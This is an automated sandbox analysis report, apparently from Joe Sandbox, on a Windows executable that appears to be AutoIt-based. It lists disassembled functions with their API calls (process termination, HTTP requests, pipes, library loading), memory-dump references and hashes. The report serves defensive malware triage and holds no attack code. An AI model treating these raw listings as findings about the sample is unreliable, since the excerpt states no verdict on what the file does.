                                                                      Function 005753E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 005753F9
                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0057540F
                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0057541E
                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0057542D
                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00575437
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0057543E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                      • String ID:
                                                                      • API String ID: 839392675-0
                                                                      • Opcode ID: 6281fbad62e0f10fdfd82307ce12c1337a156cee5a732e16471e7ae98f6cb832
                                                                      • Instruction ID: 1885bfd1db6d6878577002ba1ec758896623a6c61082efc45afeda7e7e791e75
                                                                      • Opcode Fuzzy Hash: 6281fbad62e0f10fdfd82307ce12c1337a156cee5a732e16471e7ae98f6cb832
                                                                      • Instruction Fuzzy Hash: DCF06D32240258BBE7215BA2DC0DEAF7A7CEBD6B11F01016AFA04D1050A7A01A05E7B5
                                                                      Function 00577230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 00577243
                                                                      • EnterCriticalSection.KERNEL32(?,?,00520EE4,?,?), ref: 00577254
                                                                      • TerminateThread.KERNEL32(00000000,000001F6,?,00520EE4,?,?), ref: 00577261
                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00520EE4,?,?), ref: 0057726E
                                                                        • Part of subcall function 00576C35: CloseHandle.KERNEL32(00000000,?,0057727B,?,00520EE4,?,?), ref: 00576C3F
                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00577281
                                                                      • LeaveCriticalSection.KERNEL32(?,?,00520EE4,?,?), ref: 00577288
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                      • String ID:
                                                                      • API String ID: 3495660284-0
                                                                      • Opcode ID: 198a95c81118d7e075b4845ffa5fb51083fce98f7dc9ae37303dde53080f072b
                                                                      • Instruction ID: 55b5896af550b98af60957d143b896e15ecd8a133febad600a4ae3c30a1c50b2
                                                                      • Opcode Fuzzy Hash: 198a95c81118d7e075b4845ffa5fb51083fce98f7dc9ae37303dde53080f072b
                                                                      • Instruction Fuzzy Hash: B5F05E3E540612EBDB121B64FD4CADA7B29FF69702B160533F603D10A1CB766815EB50
                                                                      Function 00568992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0056899D
                                                                      • UnloadUserProfile.USERENV(?,?), ref: 005689A9
                                                                      • CloseHandle.KERNEL32(?), ref: 005689B2
                                                                      • CloseHandle.KERNEL32(?), ref: 005689BA
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 005689C3
                                                                      • HeapFree.KERNEL32(00000000), ref: 005689CA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                      • String ID:
                                                                      • API String ID: 146765662-0
                                                                      • Opcode ID: 1a11d1543d93b920a3228804556aa6cf2080c50ac0a9b4e0e8b8d43f37b9ff54
                                                                      • Instruction ID: 8d464f50f37256ec463c1addae435fd1a25e677c84dfe6b02728a165975821f9
                                                                      • Opcode Fuzzy Hash: 1a11d1543d93b920a3228804556aa6cf2080c50ac0a9b4e0e8b8d43f37b9ff54
                                                                      • Instruction Fuzzy Hash: A5E0C236004001FBDA011FF1EC0C90ABB69FBA9322B268632F219C1070CB329428FB90
                                                                      Function 00567530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,005A2C7C,?), ref: 005676EA
                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,005A2C7C,?), ref: 00567702
                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,0059FB80,000000FF,?,00000000,00000800,00000000,?,005A2C7C,?), ref: 00567727
                                                                      • _memcmp.LIBCMT ref: 00567748
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                      • String ID: ,,Z
                                                                      • API String ID: 314563124-2090448338
                                                                      • Opcode ID: 0b5cec85e9395f737d4c5e2db29697fee67be5bf8556299cc99cdd4eb843a31c
                                                                      • Instruction ID: 1d877ee21767c31190f4f8c8e0a820e7526b31ab6492a8caf794907fcd34c418
                                                                      • Opcode Fuzzy Hash: 0b5cec85e9395f737d4c5e2db29697fee67be5bf8556299cc99cdd4eb843a31c
                                                                      • Instruction Fuzzy Hash: 9A81DD75A0010DEFCB04DFA4C984DEEBBB9FF89315F204599E506AB250DB71AE46CB60
                                                                      Function 005885ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 00588613
                                                                      • CharUpperBuffW.USER32(?,?), ref: 00588722
                                                                      • VariantClear.OLEAUT32(?), ref: 0058889A
                                                                        • Part of subcall function 00577562: VariantInit.OLEAUT32(00000000), ref: 005775A2
                                                                        • Part of subcall function 00577562: VariantCopy.OLEAUT32(00000000,?), ref: 005775AB
                                                                        • Part of subcall function 00577562: VariantClear.OLEAUT32(00000000), ref: 005775B7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                      • API String ID: 4237274167-1221869570
                                                                      • Opcode ID: 67c6b7de4f34c0f259e392f598cf7b164796ea3578c8dcc9347d03f7a047fc08
                                                                      • Instruction ID: a17dbf625ffc1058eaa3a2d0de1fe0723f469ab2fb1b56b531409f19cf179be0
                                                                      • Opcode Fuzzy Hash: 67c6b7de4f34c0f259e392f598cf7b164796ea3578c8dcc9347d03f7a047fc08
                                                                      • Instruction Fuzzy Hash: 17916A706043029FCB10EF24C48496ABBE4FFC9714F54892EF89A9B361DB31E945CB92
                                                                      Function 00572A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0052FC86: _wcscpy.LIBCMT ref: 0052FCA9
                                                                      • _memset.LIBCMT ref: 00572B87
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00572BB6
                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00572C69
                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00572C97
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                      • String ID: 0
                                                                      • API String ID: 4152858687-4108050209
                                                                      • Opcode ID: 3667c1342e71a7e8f446afad0a0d0f98d2af21d64788c976fe9b4667ef6e7398
                                                                      • Instruction ID: 4df505a26ea3d86177d48789126437fc547fc3e648d18375f331a2f160e8ef0e
                                                                      • Opcode Fuzzy Hash: 3667c1342e71a7e8f446afad0a0d0f98d2af21d64788c976fe9b4667ef6e7398
                                                                      • Instruction Fuzzy Hash: 9151B171608301ABD7269E28E845A6F7FE8FFA5310F14892EF899D3191DB70CD44A752
                                                                      Function 00523137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$_free
                                                                      • String ID: 3cR$_R
                                                                      • API String ID: 2620147621-502522525
                                                                      • Opcode ID: e4e9e555283512df2106cd34043da1d830821297a822326bd78398df52614bc8
                                                                      • Instruction ID: c202dfff10e545c532d494465a69e4d92eb79007242d46c9bf58aab735ba3c76
                                                                      • Opcode Fuzzy Hash: e4e9e555283512df2106cd34043da1d830821297a822326bd78398df52614bc8
                                                                      • Instruction Fuzzy Hash: A1519A71A043518FDB24DF28D495B6BBBE5BFC6300F44486DE98987391EB35E905CB82
                                                                      Function 00526192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memset$_memmove
                                                                      • String ID: 3cR$ERCP
                                                                      • API String ID: 2532777613-3539264084
                                                                      • Opcode ID: d0c542378bc4de15961fa2f3ca53218224aace70a59fb901cc81af73e6cc8222
                                                                      • Instruction ID: 749c87730d9049c84d5910c3eed7f95995be73ad2b624ae20b3fe55f1a21b44e
                                                                      • Opcode Fuzzy Hash: d0c542378bc4de15961fa2f3ca53218224aace70a59fb901cc81af73e6cc8222
                                                                      • Instruction Fuzzy Hash: 6C518D71900716DBDB24CFA5D845BAABBF4FF45314F20496EE44AD7291E770AA44CB80
                                                                      Function 00572753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 005727C0
                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 005727DC
                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00572822
                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,005D5890,00000000), ref: 0057286B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Delete$InfoItem_memset
                                                                      • String ID: 0
                                                                      • API String ID: 1173514356-4108050209
                                                                      • Opcode ID: ea78cd05971071fd6fb855ab40bdaba416bc2332e108fb6ee99a036d046d06fa
                                                                      • Instruction ID: c9c1c99f5987b680ea0a25eae40c4382ba09fdac8037a44c241ff81d181ae95c
                                                                      • Opcode Fuzzy Hash: ea78cd05971071fd6fb855ab40bdaba416bc2332e108fb6ee99a036d046d06fa
                                                                      • Instruction Fuzzy Hash: 4D418C702043429FD720DF25E848B5ABFE8FF85314F14892EF9A997292D731A905DB52
                                                                      Function 0058D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0058D7C5
                                                                        • Part of subcall function 0051784B: _memmove.LIBCMT ref: 00517899
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharLower_memmove
                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                      • API String ID: 3425801089-567219261
                                                                      • Opcode ID: a8cfa4a8f10cf6360725c03a4fe02858e7cc0f7e0008fefb05cb796aa40d6967
                                                                      • Instruction ID: dc42dc4d6e13426c7a973dc59aaf0e00f6c91de3ff1f1dd3d1c881c16278d29f
                                                                      • Opcode Fuzzy Hash: a8cfa4a8f10cf6360725c03a4fe02858e7cc0f7e0008fefb05cb796aa40d6967
                                                                      • Instruction Fuzzy Hash: 6A31927190461AAFDF00EF58C8599EEBBF4FF44320B108A29E825A76D1DB31A905CB90
                                                                      Function 00568E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                        • Part of subcall function 0056AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0056AABC
                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00568F14
                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00568F27
                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00568F57
                                                                        • Part of subcall function 00517BCC: _memmove.LIBCMT ref: 00517C06
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$_memmove$ClassName
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 365058703-1403004172
                                                                      • Opcode ID: 9277f993cc8b21983c3655b2c57e74ca0a2b790aafd9374c638fd27944458e48
                                                                      • Instruction ID: 2b46f7711e5481795f69c0a43129b51848bb8d6e0b91ba6e99a9e0821e4d1faa
                                                                      • Opcode Fuzzy Hash: 9277f993cc8b21983c3655b2c57e74ca0a2b790aafd9374c638fd27944458e48
                                                                      • Instruction Fuzzy Hash: 6821D271A04109BEEB14ABB4DC49DFEBF79FF95320B14461AF421A71E1DF394889DA10
                                                                      Function 0058182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0058184C
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00581872
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 005818A2
                                                                      • InternetCloseHandle.WININET(00000000), ref: 005818E9
                                                                        • Part of subcall function 00582483: GetLastError.KERNEL32(?,?,00581817,00000000,00000000,00000001), ref: 00582498
                                                                        • Part of subcall function 00582483: SetEvent.KERNEL32(?,?,00581817,00000000,00000000,00000001), ref: 005824AD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                      • String ID:
                                                                      • API String ID: 3113390036-3916222277
                                                                      • Opcode ID: 4477b5572c11a8fdede1735befa61eac487e3422f1a9580ff8ab28567b8fa504
                                                                      • Instruction ID: 30b989b8f72432e35e0f1b5be2720e2807841fedd924fb55461e5306f642f11f
                                                                      • Opcode Fuzzy Hash: 4477b5572c11a8fdede1735befa61eac487e3422f1a9580ff8ab28567b8fa504
                                                                      • Instruction Fuzzy Hash: 4C2183715006087FEB11AB64DC86EBB7BEDFB88744F10412AF805E7140DB649D055BB5
                                                                      Function 005963E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00511D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00511D73
                                                                        • Part of subcall function 00511D35: GetStockObject.GDI32(00000011), ref: 00511D87
                                                                        • Part of subcall function 00511D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00511D91
                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00596461
                                                                      • LoadLibraryW.KERNEL32(?), ref: 00596468
                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0059647D
                                                                      • DestroyWindow.USER32(?), ref: 00596485
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                      • String ID: SysAnimate32
                                                                      • API String ID: 4146253029-1011021900
                                                                      • Opcode ID: e7eef5d11676522560c4c65236c1462d45712ee9d7fa3e7af6c3eb957d1a5fba
                                                                      • Instruction ID: 17b237b6cf45492068ea8dbddd3b600e7b79d6bc3f3f9486314c972ca23fbf68
                                                                      • Opcode Fuzzy Hash: e7eef5d11676522560c4c65236c1462d45712ee9d7fa3e7af6c3eb957d1a5fba
                                                                      • Instruction Fuzzy Hash: F3216D71200206BFEF104FA4DC84EBB7BADFB59768F104A29FA1893190D775DC59A760
                                                                      Function 00576D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00576DBC
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00576DEF
                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00576E01
                                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00576E3B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHandle$FilePipe
                                                                      • String ID: nul
                                                                      • API String ID: 4209266947-2873401336
                                                                      • Opcode ID: 6e118c5e72da7ade0273eaa51eb369db4b48b3cb94c5cc18199a53c861432b13
                                                                      • Instruction ID: f52cbf0f3ce87faa2bec100e00e8882b13423b9799354956da4a8cf44cc68eaf
                                                                      • Opcode Fuzzy Hash: 6e118c5e72da7ade0273eaa51eb369db4b48b3cb94c5cc18199a53c861432b13
                                                                      • Instruction Fuzzy Hash: 1621837460061AAFDB309F29EC04A9A7FF8FF54720F208A1AFDA4D72D0D7719954AB50
                                                                      Function 00576E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00576E89
                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00576EBB
                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00576ECC
                                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00576F06
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
